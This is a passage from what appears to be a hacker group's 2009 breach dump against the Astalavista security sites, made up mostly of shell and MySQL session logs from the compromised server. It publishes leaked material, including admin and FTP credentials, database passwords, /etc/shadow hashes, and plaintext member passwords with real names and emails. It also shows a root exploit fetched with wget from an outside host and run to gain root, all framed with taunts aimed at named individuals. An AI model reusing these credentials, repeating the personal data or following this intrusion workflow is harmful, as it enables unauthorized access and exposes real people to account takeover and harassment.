	4 rows in set (0.04 sec)
	
	mysql> exit;
	Bye
	
	[~] There you go, your "team of security and IT professionals" is a
	joke.
	
	+------------------------------+
	system:f82BN3+_*
	Be1er0ph0r:belerophor4astacom
	prozac:asta4cms!
	commander:mpbdaagf6m
	sykadul:ak29eral
	+------------------------------+
	
	[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his
	milw0rm ripping script(s)
	       ...and the others, find another area to get paid from, security
	isn't for sale and you obviously fail at it.
	
	[~] Lets move to astalavista.net now,
	
	>From <https://www.astalavista.net/>:
	>> Everyone knows that the best defense is a good offense.
	>> Those who wait for their foes to find a security loophole are
	opting for the wrong strategy.
	>> The ASTALAVISTA hacking & security community is the largest IT
	security community in the world.
	>> It's a platform for both IT specialists and novices, and anyone
	interested in expanding and updating their knowledge regarding IT
	security and hacking."
	
	>> Go ahead, try and hack our server Ð in a completely legal way!
	>> Learn by doing: We offer our members tricky tasks and challenges
	on an
	>> ongoing basis so you can test your knowledge and abilities. You
	can also
	>> demonstrate what youÕve mastered by taking part in regular
	hacker contests
	>> and war games
	
	[~] Lets take a look there, after all... they are hack-proof,
	aren't they?!
	
	[-] Tricky task: Find home dir of astalavista.net
	
	sh-3.2$ ls -la ~astanet
	total 48
	drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .
	drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
	drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
	-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
	-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
	-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
	-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
	drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
	drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
	drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
	lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html ->
	./domains/astalavista.net/public_html
	-rw-r----- <http://astalavista.net/public_html-rw-r----->   1 astanet mail      34 Dec 22 12:41 .shadow
	
	sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
	sh-3.2$ <http://astalavista.net/private_html/sh-3.2$>  ls -la
	total 200
	drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .
	drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..
	drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
	drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
	drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16
	astanet@...alavista.com
	drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
	drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
	-rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg
	drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
	drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
	drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
	-rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php
	-rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico
	drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
	drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
	-rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess
	-rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess
	-rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php
	-rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html
	-rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php
	-rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php
	-rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf
	drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
	drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
	drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
	drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
	drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
	drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
	drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
	-rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf
	drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
	-rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt
	drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
	drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
	drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
	drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
	drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
	drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
	drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
	drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
	-rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php
	drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
	
	sh-3.2$ head -20 index.php
	<?PHP
	/**
	* Mainfile (external) for astalavistaNET v2.0
	*
	* @copyright     Astalavista IT Engineering GmbH
	* @author        Thomas Kaelin <thomas.kaelin@...alavista.ch>
	* @version       1.0
	*/
	
	       if ($_SERVER['PHP_SELF'] == '/webcash.php') {
	               $dontStartSession = false;
	       } else {
	               $dontStartSession = true;
	       }
	
	require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
	
	require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
	
	require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.cl
	ass.php');
	
	require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.cl
	ass.php');
	
	sh-3.2$ cd config
	sh-3.2$ ls -la
	total 32
	drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
	drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
	-rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php
	-rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
	-rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php
	-rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
	-rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php
	
	sh-3.2$ cat com.conf.php
	[snip]
	//member-database
	$_CONFIG['db_mem_server']       = 'localhost';
	$_CONFIG['db_mem_database'] = 'astanet_membersystem';
	$_CONFIG['db_mem_user']         = 'astanet_db';
	$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
	$_CONFIG['db_mem_debug']        = false; //true or false
	//ads-database
	$_CONFIG['db_ads_server']       = 'localhost';
	$_CONFIG['db_ads_database'] = 'astanet_ads';
	$_CONFIG['db_ads_user']         = 'astanet_db';
	$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
	$_CONFIG['db_ads_debug']        = false; //true or false
	//rainbow-database
	$_CONFIG['db_rainbow_server']   = '212.254.194.163';
	$_CONFIG['db_rainbow_database'] = 'rainbow';
	$_CONFIG['db_rainbow_user']     = 'dinu';
	$_CONFIG['db_rainbow_password'] = 'dinudinu';
	$_CONFIG['db_rainbow_debug']    = false; //true or false
	//mailing lists database
	$_CONFIG['db_mailing_lists_server']     = 'localhost';
	$_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';
	$_CONFIG['db_mailing_lists_user']               = 'astanet_db';
	$_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';
	$_CONFIG['db_mailing_lists_debug']              = false; //true or
	false
	//paypal
	$_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-
	bin/webscr <https://www.paypal.com/cgi-bin/webscr> ';
	$_CONFIG['sub_pp_cmd']          = '_xclick';
	$_CONFIG['sub_pp_business'] = 'info@...alavista.net';
	$_CONFIG['sub_pp_noship']       = '1';
	$_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';
	[snip]
	
	sh-3.2$ cd ..
	sh-3.2$ cd member
	sh-3.2$ ls -la
	total 20
	drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
	drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
	-rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess
	-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
	sh-3.2$ cat .htaccess
	SecFilterEngine off
	
	sh-3.2$ cd ..
	sh-3.2$ cd cron
	sh-3.2$ ls -la
	total 168
	drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
	drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..
	-rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
	-rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php
	-rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
	-rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
	-rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
	-rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php
	-rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
	-rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
	-rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
	-rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
	-rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
	-rw-r--r--  1 astanet astanet  7657 Aug 15  2006
	2_exploitree_updater.php
	-rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
	-rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
	-rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
	-rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
	-rw-r--r--  1 astanet astanet  7558 Aug 11  2006
	2_proxy_collector.php
	-rw-r--r--  1 astanet astanet   796 Aug 11  2006
	99_create_emails.php
	drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
	-rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
	-rw-r--r--  1 astanet astanet  9620 Jan  6 16:05
	login_reminder_test.php
	
	sh-3.2$ cd ..
	sh-3.2$ cd _007
	sh-3.2$ ls -la
	total 24
	drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
	drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
	-rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess
	-rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php
	-rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php
	drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
	
	sh-3.2$ cat  .htaccess
	authType Basic
	authName Admin
	authUserFile /home/astanet/auth/.htadm_pwd
	require valid-user
	
	sh-3.2$ cat /home/astanet/auth/.htadm_pwd
	admin2net:CR0bl65MwhfT
	
	sh-3.2$ mysql -u astanet_db -p
	Enter password:
	Welcome to the MySQL monitor.  Commands end with ; or \g.
	Your MySQL connection id is 275153
	Server version: 5.0.45-community-log MySQL Community Edition (GPL)
	
	Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
	
	mysql> show databases;
	+-----------------------+
	| Database              |
	+-----------------------+
	| information_schema    |
	| astanet_ads           |
	| astanet_mailing_lists |
	| astanet_mediawiki     |
	| astanet_membersystem  |
	| test                  |
	+-----------------------+
	6 rows in set (0.00 sec)
	
	mysql> use astanet_membersystem
	Database changed
	mysql> show tables;
	+-----------------------------------+
	| Tables_in_astanet_membersystem    |
	+-----------------------------------+
	| blacklist_categories              |
	| blacklist_content                 |
	| blacklist_levels                  |
	| blacklist_mcset                   |
	| dir_categories                    |
	| dir_comments                      |
	| dir_links                         |
	| dir_temp                          |
	| dir_votes                         |
	| documents                         |
	| documents_categories              |
	| email_content                     |
	| email_settings                    |
	| exploits                          |
	| exploits_categories               |
	| exploittree_categories            |
	| exploittree_exploits              |
	| home_values                       |
	| iso_countries                     |
	| links_categories                  |
	| links_records                     |
	| links_unauth                      |
	| links_votes                       |
	| log                               |
	| news_categories                   |
	| news_comments                     |
	| news_emoticons                    |
	| news_latest                       |
	| news_messages                     |
	| news_statistics                   |
	| news_votes                        |
	| prices_content                    |
	| prices_offers                     |
	| rss_settings                      |
	| sessions                          |
	| stats_signups                     |
	| u2u2                              |
	| u2u_contact                       |
	| u2u_settings                      |
	| user_keywords_selected_categories |
	| users                             |
	| users_ipn_test                    |
	| users_keyword_values              |
	| users_profile                     |
	| users_temp                        |
	| users_upgrade                     |
	+-----------------------------------+
	46 rows in set (0.00 sec)
	
	mysql> describe users;
	+--------------------------+--------------------------------------+-
	-----+-----+---------------------+----------------+
	| Field                    | Type                                 |
	Null | Key | Default             | Extra          |
	+--------------------------+--------------------------------------+-
	-----+-----+---------------------+----------------+
	| primary_key              | smallint(5) unsigned                 |
	NO   | PRI | NULL                | auto_increment |
	| user                     | varchar(50)                          |
	NO   |     |                     |                |
	| nickname                 | varchar(30)                          |
	NO   | MUL | anonymous           |                |
	| password                 | varchar(30)                          |
	NO   |     |                     |                |
	| userlevel                | tinyint(3)                           |
	YES  | MUL | NULL                |                |
	| exp                      | int(8) unsigned                      |
	NO   |     | 0                   |                |
	| email                    | varchar(50)                          |
	NO   |     |                     |                |
	| ip                       | varchar(15)                          |
	NO   |     | 0                   |                |
	| proxy                    | set('0','1')                         |
	NO   |     | 0                   |                |
	| logtime                  | timestamp                            |
	NO   |     | CURRENT_TIMESTAMP   |                |
	| login_reminder_last_sent | timestamp                            |
	NO   |     | 0000-00-00 00:00:00 |                |
	| anz_in                   | tinyint(1)                           |
	NO   |     | -1                  |                |
	| status                   | tinyint(1) unsigned                  |
	NO   |     | 0                   |                |
	| checked                  | set('0','1','2')                     |
	NO   |     | 0                   |                |
	| freemember               | set('0','1')                         |
	NO   |     | 0                   |                |
	| ordertype                | set('transfer','wp','pp','mc','CnB') |
	YES  |     | NULL                |                |
	| lang                     | tinytext                             |
	NO   |     |                     |                |
	| adid                     | smallint(6)                          |
	NO   |     | 0                   |                |
	| pp_txn_id                | varchar(255)                         |
	YES  |     | NULL                |                |
	| cnb_transaction_id       | varchar(255)                         |
	YES  |     | NULL                |                |
	| cnb_order_id             | varchar(255)                         |
	YES  |     | NULL                |                |
	| cnb_user_id              | int(11)                              |
	YES  |     | 0                   |                |
	+--------------------------+--------------------------------------+-
	-----+-----+---------------------+----------------+
	22 rows in set (0.01 sec)
	
	mysql> select count(*) as skids from users;
	+-------+
	| skids |
	+-------+
	| 25199 |
	+-------+
	1 row in set (0.00 sec)
	
	mysql> select user,nickname,password,email from users where
	userlevel = 1;
	+--------------------------+----------------------+-----------------
	-+-----------------------------------+
	| user                     | nickname             | password
	 | email                             |
	+--------------------------+----------------------+-----------------
	-+-----------------------------------+
	| pascal                   | prozac               | astaman3
	 | info@...alavista.net              |
	| Ivan Schmid              | rOOtless1            |
	astalavista4asta | ivan.schmid@...vation.com         |
	| qreymer                  | Palermo              | qblsw85iam
	 | eche@...e.se                      |
	| Christian Wehrli         | g0atherd             | hitt?74
	 | g0atherd@....net                  |
	| Andrew Blake             | Minky                | liq73uid
	 | a.blake@....mrc.ac.uk             |
	| Martin Wyss              | dinu                 | kj63;cXy
	 | martin.wyss@...alavista.net       |
	| Leandro Nery             | Timan_no_Sanco       | nery2002
	 | leandronery@...mail.com           |
	| shaving ryans privates   | ShavingRyansPrivates | memberboard313
	 | shavingryansprivates1@...mail.com |
	| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5
	 | spoofedexistence@...mail.com      |
	| David M Lee              | Daremo               | icG12m03
	 | daremo@...kerheaven.com           |
	| David Corn               | akriel               | ve3uB$cUku
	 | akriel@...lenroot.net             |
	| Thomas Kalin             | Gwanun               | QwErTy123
	 | thomas.kaelin@...alavista.net     |
	| Marcus unknown           | Cra58cker            | hhCr4ck06
	 | unknownmarcus@...mail.com         |
	| David Ellis              | dellis203            | philip
	 | dellis@...htwatchnss.com          |
	| Lars Christian Solberg   | xeor                 | tF3s4|Nea
	 | xeor@...h.com                     |
	| Paulo Santos             | Be1er0ph0r1          | amor01
	 | pmsantos@....ch                   |
	| Thomas D?ppen            | daha                 | asta4tom
	 | thomas.daeppen@...alavista.ch     |
	| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck
	 | toraj.a.m@...il.com               |
	| Fabius Bernet            | traviser             | wellenreiter100
	 | fabius.bernet@...alavista.ch      |
	| Zachary McElroy          | duder1               | dirty245dix
	 | mcelroyzj@...oo.com               |
	| Leron Cohen              | cohen2               | leron4free
	 | leron@...redmedia.com             |
	| Beatriz Pontes           | anonymous1656        | pitas
	 | joao.pedro.pontes@...il.com       |
	| Glafkos Charalambous     | anonymous2086        | si99490178$#
	 | nowayout@...hostline.com          |
	| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU
	 | ivan.schmid@...alavista.ch        |
	| Peter Fisher             | cyph3r1              | testZer025435
	 | cyph3r@...alavista.com            |
	| sykadul                  | sykadul              | ak29eral
	 | sykadul@...il.com                 |
	| Ronny Janzi              | commander1           | mpbdaagf6m
	 | ronny.janzi@...alavista.ch        |
	+--------------------------+----------------------+-----------------
	-+-----------------------------------+
	27 rows in set (0.00 sec)
	
	mysql> exit;
	Bye
	
	[~] plaintext passwords? yes,
	       Those so called "security professionals" who charge you $6.66 /
	month to
	       register at their hack-proof portal, save your passwords in
	plaintext...
	       brilliant!
	
	
	[~] This been fun but we want more.
	
	sh-3.2$ uname -a
	Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu
	May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
	sh-3.2$ wget http://anti.sec.labs/g0troot
	--13:33:37-- <http://anti.sec.labs/g0troot--13:33:37-->   http://anti.sec.labs/g0troot
	Resolving anti.sec.labs... 13.33.33.37
	Connecting to anti.sec.labs|13.33.33.37|:80... connected.
	HTTP request sent, awaiting response... 200 OK
	Length: 18200 (18K) [text/plain]
	Saving to: `g0troot'
	
	100%[===============================================================
	====================================================================
	======>] 18,200      58.6K/s   in 0.3s
	
	18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
	
	sh-3.2$ ./g0troot -i x86_64
	       [+] g0troot - anti.sec.labs
	       [+] Target: 2.6.18-128.1.10.el5
	       [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
	
	       [+] r00tr00t
	       [~] Executing shell...
	
	sh-3.2# id
	uid=0(root) gid=0(root)
	groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
	
	sh-3.2# cat /etc/shadow
	root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
	[snip]
	admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
	jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
	com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
	astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
	
	sh-3.2# cat /etc/motd
	#####################################################
	#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
	# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
	# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
	#                                                   #
	#####################################################
	#                                                   #
	# Admin Contact - support@...ureservertech.com      #
	#                                                   #
	# Available ShortCuts                               #
	#                                                   #
	# nst -  list active connections                    #
	# ddos - shows how many times each ip is connected  #
	# ltr -  restart the webserver                      #
	# phpc - edit the php config file                   #
	# htc -  edit the webserver configuration file      #
	# up -   uptime                                     #
	# etd - edit the motd of the day file               #
	# htr - start and restart apache if needed          #
	# syng - shows active SYN_RECV connections          #
	# synd - syn flood blocker - "synd -h" for usage    #
	#####################################################
	# NOTES:                                            #
	# Last Upgrade - 12-08-2008 by JF                   #
	# My.cnf/Mysql Optimization - 1-28-09               #
	#                                                   #
	#                                                   #
	#                                                   #
	#####################################################
	
	sh-3.2# lastlog | grep -v Never
	Username         Port     From             Latest
	root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14
	+0000 2009
	admin            pts/1    cp.secureservert Thu Mar 20 10:25:39
	+0000 2008
	com              pts/0    cust.static.212- Tue Jun  2 07:46:30
	+0000 2009
	astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44
	+0000 2009
	
	sh-3.2# ls -la
	total 453376
	drwxr-x--- 15 root root       4096 Jun  4 08:40 .
	drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
	-rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip
	-rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
	-rw-------  1 root root      16836 Jun  4 07:21 .bash_history
	-rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout
	-rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile
	-rw-r--r--  1 root root        176 Jan  6  2007 .bashrc
	-rwx------  1 root root       1899 Oct 28  2007 bk.sh
	-rw-r--r--  1 root root       1327 Nov 29  2007 cert
	-rw-r--r--  1 root root  139860821 May 14  2008
	contrexxbackup_20080514.sql
	drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
	-rw-r--r--  1 root root        100 Jan  6  2007 .cshrc
	-rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
	drwx------  2 root root       4096 Oct 28  2007 .elinks
	drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
	-rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
	-rw-------  1 root root          0 Apr 16 13:19 .history
	-rw-r--r--  1 root root      16095 Sep 11  2007 install.log
	-rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog
	-rw-r--r--  1 root root       1003 Jul 22  2007 install.sh
	-rw-------  1 root root         35 Jun  2 14:23 .lesshst
	drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
	drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
	-rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-
	grsec.tar.gz
	-rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
	-rwx------  1 root root        760 Sep 18  2008 lp
	drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
	-rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-
	x86_64-linux.tar.gz
	-rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-
	x86_64-linux.tar.gz.1
	drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
	-rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-
	x86_64-linux.tar.gz
	drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
	-rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-
	x86_64-linux.tar.gz
	-rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh
	-rw-------  1 root root         41 Oct 19  2007 .my.cnf
	-rw-------  1 root root       2902 Jun  4 08:40 .mysql_history
	-rwx------  1 root root      38873 Apr 16  2008 mysqlreport
	-rw-------  1 root root         41 May 20  2008 .mytop
	drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
	-rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
	drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
	-rw-------  1 root root       1462 Sep 21  2007 opt.php
	-rw-r--r--  1 root root       3371 Sep 22  2007 p
	-rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
	-rw-------  1 root root       1024 Feb  3 21:32 .rnd
	-rw-r--r--  1 root root        716 Nov 28  2007 server.csr
	-rw-r--r--  1 root root        887 Nov 28  2007 server.key
	drwx------  2 root root       4096 Oct 10  2008 .ssh
	-rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
	-rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc
	-rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip
	-rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1
	drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
	-rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh
	drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
	-rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-
	3.3.0.tar.bz2
	-rw-------  1 root root      12997 May 16  2008 .viminfo
	
	sh-3.2# cat .bash_history
	[snip]
	wget cp4sst.com/sstlinux.tar.gz
	tar zxvf sstlinux.tar.gz
	cd linux-2.6.27.10
	sh install.sh
	make bzImage ; make modules ; make modules_install ; make install
	make clean
	service mysqld restart
	[snip]
	cd /usr/sbin/
	chmod 4777 traceroute
	chmod 4777 ping
	traceroute -I www.astalavista.ch
	[snip]
	vi /etc/csf/csf.conf
	traceroute google.ch
	service csf restart
	tracert google.ch
	service csf restart
	traceroute www.google.ch
	tracert www.google.ch
	traceroute www.google.ch
	locate traceroute
	chown 4755 /bin/traceroute
	chown 4777 /bin/traceroute
	locate ping
	chown 4755 /bin/ping
	chown 4777 /bin/ping
	cd /bin/
	ls -ali | grep ping
	chown root ping
	chmod 4755 ping
	ls -ali | grep traceroute
	chown root traceroute
	chmod 4755 traceroute
	ls -ali | grep traceroute
	traceroute -I www.google.ch
	traceroute www.google.ch
	whois pmsantos.ch
	[snip]
	mysql -h com_contrexx2_live < /root/defaultp_ports.sql
	mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live <
	/root/defaultp_ports.sql
	mysql -h -u contrexxuser2 -p com_contrexx2_live <
	/root/defaultp_ports.sql
	mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
	top
	ping ssth.ch
	ping asdlkfaljgasd???ljg???lasj.ch
	ping asdlkfaljgasdlasj.ch
	ping www.ssth.ch
	ping ssth.ch
	nslookup www.google.ch
	nslookup www.ssth.ch
	man nslookup
	ping www.google.ch
	nslookup www.google.ch
	nslookup www.google.ch
	nslookup salfjasdlf.ch
	[snip]
	openssl passwd -1 sadf
	openssl passwd -1 5cZNHstdTy
	mysql
	mysql
	locate proftp
	vi /etc/proftpd.passwd
	service proftpd restart
	locate proftpd.conf
	vi /etc/proftpd.conf
	vi /etc/proftpd.passwd
	service proftpd restart
	[snip]
	/bin/sh /home/com/backup_system/backup.sh
	tar cfv /home/com/backups/09-04-28_backup.tar
	/home/com/public_html/admin
	mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
	com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
	mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
	com_contrexx2 > 09-04-29-com_contrexx2-full.sql
	ls -ali
	mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
	com_contrexx > 07-04-29-com_contrexx-full.sql
	mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
	ideapool > 07-04-29-ideapool-full.sql
	crontab -l
	crontab -l
	php -q /home/com/public_html/modifications/cronjobs/securitynews.php
	/home/com/public_html/modifications/cronjobs/exploits.sh
	wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-
	x86_64-linux.tar.gz <http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz> 
	tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
	cd lsws-4.0.3
	sh install.sh
	uptime
	hdparm -tt /dev/sda
	iostat
	yum install iostat
	iostat
	whereis iostat
	yjm clean all
	yum clean all ; yum -y update
	iostat
	yum install systat
	rpm -qa | grep iostat
	rpm -qa | grep sysstat
	rpm -qa | grep systat
	dmesg -c
	sysctl -p
	uname -r
	cd /usr/src
	wget nix101.com/kernels/sstlinux.tar.gz
	shutdown -r now
	nano -w /boot/grub/grub.conf
	
	sh-3.2# cat .my.cnf
	[client]
	user=da_admin
	password=X9dctmRH
	
	sh-3.2# cat /home/com/backup_system/backup.sh
	#!/bin/sh
	####################################################################
	#
	#
	#
	#   incremental backup for astalavista.com
	#
	#
	#
	#   author:    Paulo M. Santos <paulo.santos@...alavista.com>
	#
	#
	#
	####################################################################
	#
	[snip]
	PROG_DIR="/home/com/backup_system";
	BACKUP_DIR="/home/com/backups";
	DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
	# ftp for synology backup server
	FTP_HOST="212.254.194.163";
	FTP_PORT="21";
	FTP_USER="astalavista.com";
	FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
	FTP_DIR="/astalavista.com";
	# database
	DB_HOST="localhost";
	DB_USER="contrexxuser2";
	DB_PASS="0fEYNZgXz1pKe";
	DB_DATABASE1="com_contrexx2_live";
	DB_DATABASE2="com_contrexx2";
	[snip]
	ftp -in $FTP_HOST $FTP_PORT <<EOF
	quote USER $FTP_USER
	quote PASS $FTP_PASS
	cd $FTP_DIR
	put $DB_FULLNAME-SQL_Dump.tar
	put $BACKUP_FULLNAME-Public_HTML.tar
	close
	bye
	EOF
	
